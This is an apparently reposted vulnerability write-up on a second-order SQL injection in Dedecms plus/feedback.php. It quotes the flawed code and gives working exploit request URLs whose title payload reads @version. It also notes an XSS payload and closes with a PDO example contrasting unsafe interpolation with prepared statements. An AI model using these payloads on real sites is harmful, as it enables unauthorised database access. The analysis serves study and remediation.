Dedecms chicken-level injection and detailed analysis process

Source: Internet
Author: User

A second-order injection; the length limit makes it rather painful. Also, happy New Year to everyone. The relevant code from plus/feedback.php:

    233 extract($arcRow, EXTR_SKIP);
    234 $msg = cn_substrR(TrimMsg($msg), 1000);
    235 $username = cn_substrR(HtmlReplace($username, 2), 20);
    236 if (empty($feedbacktype) || ($feedbacktype != 'good' && $feedbacktype != 'bad'))
    237 {
    238     $feedbacktype = 'feedback';
    239 }
    240 // Save the comment content
    241 if ($comtype == 'comments')
    242 {
    243     $arctitle = addslashes($title);
    244     $typeid = intval($typeid);
    245     $ischeck = intval($ischeck);
    246     $feedbacktype = preg_replace("#[^0-9a-z]#i", "", $feedbacktype);
    247     if ($msg != '')
    248     {
    249         $inquery = "INSERT INTO `dede_feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)
    250             VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg'); ";
    251         $rs = $dsql->ExecuteNoneQuery($inquery);
    252         if (!$rs)
    253         {
    254             ShowMsg('An error occurred while posting the comment!', '-1');
    255             // echo $dsql->GetError();
    256             exit();
    257         }
    258     }
    259 }
    260 // Quote (reply)
    261 elseif ($comtype == 'reply')
    262 {
    263     $row = $dsql->GetOne("SELECT * FROM `dede_feedback` WHERE id = '$fid'");
    264     $arctitle = $row['arctitle'];
    265     $aid = $row['aid'];
    266     $msg = $quotemsg . $msg;
    267     $msg = HtmlReplace($msg, 2);
    268     $inquery = "INSERT INTO `dede_feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)
    269         VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')";
    270     $dsql->ExecuteNoneQuery($inquery);
    271 }

Theory: INSERT → SELECT → INSERT.

Line 233: extract() is called with EXTR_SKIP, so $title can be set freely from the request. Line 243: before the first INSERT, $title is escaped once with addslashes(). When $title = test\' enters the database, it is stored as test'. Line 263: the SELECT reads arctitle back as test', and line 268 puts that value into the second INSERT without any escaping, which is where the actual injection happens.

Assume the first request is:

http://localhost/dede7/plus/feedback.php?action=send&aid=1&&comtype=comments&isconfirm=yes&notuser=1&msg=stage1111&title=yy', 0, 'feedback', 0, @version), (9, 1, '','

With gpc on, the $title on line 243 is escaped twice; when it enters the database it becomes: (screenshot not preserved)

We then quote this message:

http://localhost/dede7/plus/feedback.php?action=send&aid=1&&comtype=reply&isconfirm=yes&notuser=1&msg=stage2222&fid=38

And quote the message with id 41 once more: (screenshot not preserved)

Successful injection: (screenshot not preserved)

The theoretical value outweighs the practical one. This injection is not very harmful, because arctitle is defined in MySQL as varchar(60) NOT NULL, and 60 bytes is not enough room to also get past an IDS. plus/bookfeedback.php has the same pattern, but bookfeedback.php does not seem to be enabled and was not tested. By the way, with title=<script>alert(1)</script> there is also an XSS.
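The reply branch is exploitable because escaping is applied per query and does not carry over to data read back out of the database. The following is an added example, not Dedecms code: a minimal PDO/SQLite model of the comments → reply flow, with the unsafe interpolation of the stored title next to a prepared-statement version; table and column names are simplified and the inputs are constructed.

```php
<?php
// Added example (not Dedecms code): model of the feedback.php comments -> reply
// flow on an in-memory SQLite database. Only aid, arctitle and msg are kept.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE dede_feedback (id INTEGER PRIMARY KEY, aid INTEGER, arctitle TEXT, msg TEXT)');

// Stage 1 (comments branch): the title is escaped once for this INSERT, so the
// stored value is the raw user input, quote included. Escaping is per query.
function saveComment(PDO $db, int $aid, string $title, string $msg): int
{
    $t = $db->quote($title);   // driver-correct escaping, the role addslashes() plays for MySQL
    $m = $db->quote($msg);
    $db->exec("INSERT INTO dede_feedback (aid, arctitle, msg) VALUES ($aid, $t, $m)");
    return (int) $db->lastInsertId();
}

// Stage 2 as in the original reply branch: arctitle is read back from the table
// and interpolated into a new INSERT unescaped. The stored quote terminates the
// string literal and the query breaks: the second-order injection point.
function replyUnsafe(PDO $db, int $fid, string $msg): void
{
    $row = $db->query("SELECT aid, arctitle FROM dede_feedback WHERE id = $fid")->fetch(PDO::FETCH_ASSOC);
    $m = $db->quote($msg);
    $db->exec("INSERT INTO dede_feedback (aid, arctitle, msg) VALUES ({$row['aid']}, '{$row['arctitle']}', $m)");
}

// Hardened: every value, including one that came from our own database, is
// bound as a parameter, so nothing depends on escaping done for an earlier query.
function replySafe(PDO $db, int $fid, string $msg): int
{
    $sel = $db->prepare('SELECT aid, arctitle FROM dede_feedback WHERE id = :id');
    $sel->execute([':id' => $fid]);
    $row = $sel->fetch(PDO::FETCH_ASSOC);
    $ins = $db->prepare('INSERT INTO dede_feedback (aid, arctitle, msg) VALUES (:aid, :title, :msg)');
    $ins->execute([':aid' => $row['aid'], ':title' => $row['arctitle'], ':msg' => $msg]);
    return (int) $db->lastInsertId();
}

$fid = saveComment($db, 1, "test'", 'stage1');   // constructed input containing a quote
try {
    replyUnsafe($db, $fid, 'stage2');
    echo "unsafe reply: accepted\n";
} catch (PDOException $e) {
    echo "unsafe reply: query broken by the stored quote -> ", $e->getMessage(), "\n";
}
$rid = replySafe($db, $fid, 'stage2');
$title = $db->query("SELECT arctitle FROM dede_feedback WHERE id = $rid")->fetchColumn();
echo "safe reply stored title: ", $title, "\n";    // the quote survives intact as data
```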
 
